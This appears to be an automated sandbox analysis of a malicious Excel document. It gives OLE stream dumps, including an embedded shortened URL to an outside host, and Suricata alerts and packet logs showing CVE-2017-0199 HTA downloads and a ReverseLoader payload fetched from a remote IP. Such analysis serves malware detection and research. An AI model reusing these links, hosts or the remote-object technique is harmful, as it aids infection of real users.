                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 3c cc 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 6c 00 00 00 12 00 00 00 7c 00 00 00 0b 00 00 00 94 00 00 00 0c 00 00 00 a0 00 00 00 0d 00 00 00 ac 00 00 00 13 00 00 00 b8 00 00 00 11 00 00 00 c0 00 00 00
                                                                      Stream Path: MBD003994AB/MBD0145F583/\x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F583/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.219515110876372
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD0145F583/Package, File Type: Microsoft Excel 2007+, Stream Size: 22251
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F583/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:22251
                                                                      Entropy:7.612475685241722
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . . z > . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c1 0c 7a 3e 86 01 00 00 38 05 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD0145F818/\x1CompObj, File Type: data, Stream Size: 94
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:94
                                                                      Entropy:4.345966460061678
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD0145F818/\x1Ole, File Type: data, Stream Size: 64
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:64
                                                                      Entropy:2.904417186688699
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 3 3 .
                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 33 33 00
                                                                      Stream Path: MBD003994AB/MBD0145F818/CONTENTS, File Type: PDF document, version 1.3, 1 pages, Stream Size: 50134
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F818/CONTENTS
                                                                      CLSID:
                                                                      File Type:PDF document, version 1.3, 1 pages
                                                                      Stream Size:50134
                                                                      Entropy:7.717515618096627
                                                                      Base64 Encoded:True
                                                                      Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 5 9 4 . 3 6 8 4 0 . 6 0 ] . / C r o p B o x [ 0 0 5 9 4 . 3 6 8 4 0 . 6 0 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                                                                      Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 35 39 34 2e 33 36 20 38 34 30 2e 36 30 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 35 39 34 2e 33 36 20 38 34 30 2e 36 30 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                                                                      Stream Path: MBD003994AB/MBD01462F13/\x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01462F13/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.219515110876372
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD01462F13/Package, File Type: Microsoft Excel 2007+, Stream Size: 66298
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01462F13/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:66298
                                                                      Entropy:7.892486361087618
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . e . , . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 65 8c 03 2c b7 01 00 00 9e 06 00 00 13 00 d4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD01463AB5/\x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/MBD01463AB5/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:708
                                                                      Entropy:3.6235698530352805
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                                      Stream Path: MBD003994AB/MBD01463AB5/\x5SummaryInformation, File Type: data, Stream Size: 23248
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:23248
                                                                      Entropy:3.026179220197763
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00
                                                                      Stream Path: MBD003994AB/MBD01463AB5/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 97808
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD01463AB5/Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:97808
                                                                      Entropy:7.365522783516277
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Stream Path: MBD003994AB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 354965
                                                                      General
                                                                      Stream Path:MBD003994AB/Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:354965
                                                                      Entropy:7.8032787826227565
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . x . x < $ 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Stream Path: MBD003994AC/\x1Ole, File Type: data, Stream Size: 644
                                                                      General
                                                                      Stream Path:MBD003994AC/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:644
                                                                      Entropy:5.771739288457116
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . ' e 0 = x s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . G . 5 . d . F . ? . & . r . a . n . k . = . u . t . t . e . r . m . o . s . t . & . f . a . n . = . d . e . c . o . r . o . u . s . & . b . a . r . r . a . c . k . s . = . d . r . u . n . k . & . k . e . t . t . l . e . d . r . u . m . = . f . l . i . p . p . a . n . t . & . b . a . n . a . n . a . = . l . o . o . s . e . & . b . a . t . h . r . o . o . m . . . B . > E O x d . . .
                                                                      Data Raw:01 00 00 02 27 87 b6 65 30 3d 78 73 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ac 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 47 00 35 00 64 00 46 00 3f 00 26 00 72 00 61 00 6e 00 6b 00 3d 00 75 00 74 00 74 00 65 00 72 00 6d 00 6f 00 73 00 74 00 26 00 66 00 61 00 6e 00 3d 00
                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 396145
                                                                      General
                                                                      Stream Path:Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:396145
                                                                      Entropy:7.999004124760168
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . r $ . 4 7 " K E " u . v . > F . . w : f G . ' / . > p . R . . . . . . . . . . . y 6 . . . \\ . p . d . Q . F . . . L T A o m . | . . . k . e C ( 4 - . a . . c 3 . . . @ u K . O . . . - . R C . D E 7 . . . d c ~ . . B . . . v a . . . B G . . . = . . . . D X 4 z U . . . ' o V . 0 m d [ . . . . . . . ` y . . . . l . . . . . r . . . @ | . . . C = . . . . . m ^ . A . 3 ) w @ . . . h . . . . d . " . . . M . . . . B . . . . . . . 1 . . . . O ~ . # . L 8 J .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 72 c0 24 cc f8 07 da 34 37 22 4b fa 45 22 75 db 9b 84 76 9d 05 8c 3e f0 46 07 0c 77 b9 bc c0 3a 66 47 0a dd 27 85 b1 2f 1b 3e 20 70 0f be 52 ca 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 79 36 e2 00 00 00 5c 00 70 00 ba 64 e9 7f b2 a2 51 dd 95 d2 46 e5 c0 17 02 fd 1e 4c fb 54 41 6f 6d 98 94 ab
                                                                      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                      CLSID:
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:521
                                                                      Entropy:5.241989610017547
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 8 0 F B 7 2 1 3 - 7 5 F A - 4 B 0 0 - A E 5 8 - 2 1 D B F F 2 7 F 8 1 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 9 D B 3 C C 4 4 0 C 4 4 0 C 4 4
                                                                      Data Raw:49 44 3d 22 7b 38 30 46 42 37 32 31 33 2d 37 35 46 41 2d 34 42 30 30 2d 41 45 35 38 2d 32 31 44 42 46 46 32 37 46 38 31 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:104
                                                                      Entropy:3.0488640812019017
                                                                      Base64 Encoded:False
                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:2644
                                                                      Entropy:3.9855407016531923
                                                                      Base64 Encoded:False
                                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 552
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:552
                                                                      Entropy:6.3780587508051045
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. $ . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . O . Y i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                      Data Raw:01 24 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4f 0e 59 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-28T07:28:05.786085+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164172.245.123.2980TCP
                                                                      2024-11-28T07:28:05.786269+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.2980192.168.2.2249164TCP
                                                                      2024-11-28T07:28:11.300059+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166172.245.123.2980TCP
                                                                      2024-11-28T07:28:11.300068+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.2980192.168.2.2249166TCP
                                                                      2024-11-28T07:28:17.864630+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167172.245.123.2980TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 07:27:57.536921024 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:27:57.536967993 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:27:57.537043095 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:27:57.543118954 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:27:57.543132067 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:03.877631903 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:03.877720118 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:03.886934042 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:03.886945963 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:03.887173891 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:03.887219906 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:03.953509092 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:03.995326996 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:04.497509003 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:04.497586012 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:04.497734070 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:04.497734070 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:04.500034094 CET49163443192.168.2.22152.231.117.86
                                                                      Nov 28, 2024 07:28:04.500049114 CET44349163152.231.117.86192.168.2.22
                                                                      Nov 28, 2024 07:28:04.509463072 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:04.629528046 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:04.629676104 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:04.629838943 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:04.750286102 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.785815954 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.785836935 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.785846949 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.785981894 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786034107 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786045074 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786084890 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786086082 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786086082 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786086082 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786268950 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786281109 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786292076 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786303043 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.786319971 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786351919 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.786351919 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.794523954 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.906258106 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.906344891 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.906377077 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.908116102 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.910320997 CET8049164172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:05.910381079 CET4916480192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:05.987061977 CET8049164172.245.123.29192.168.2.22
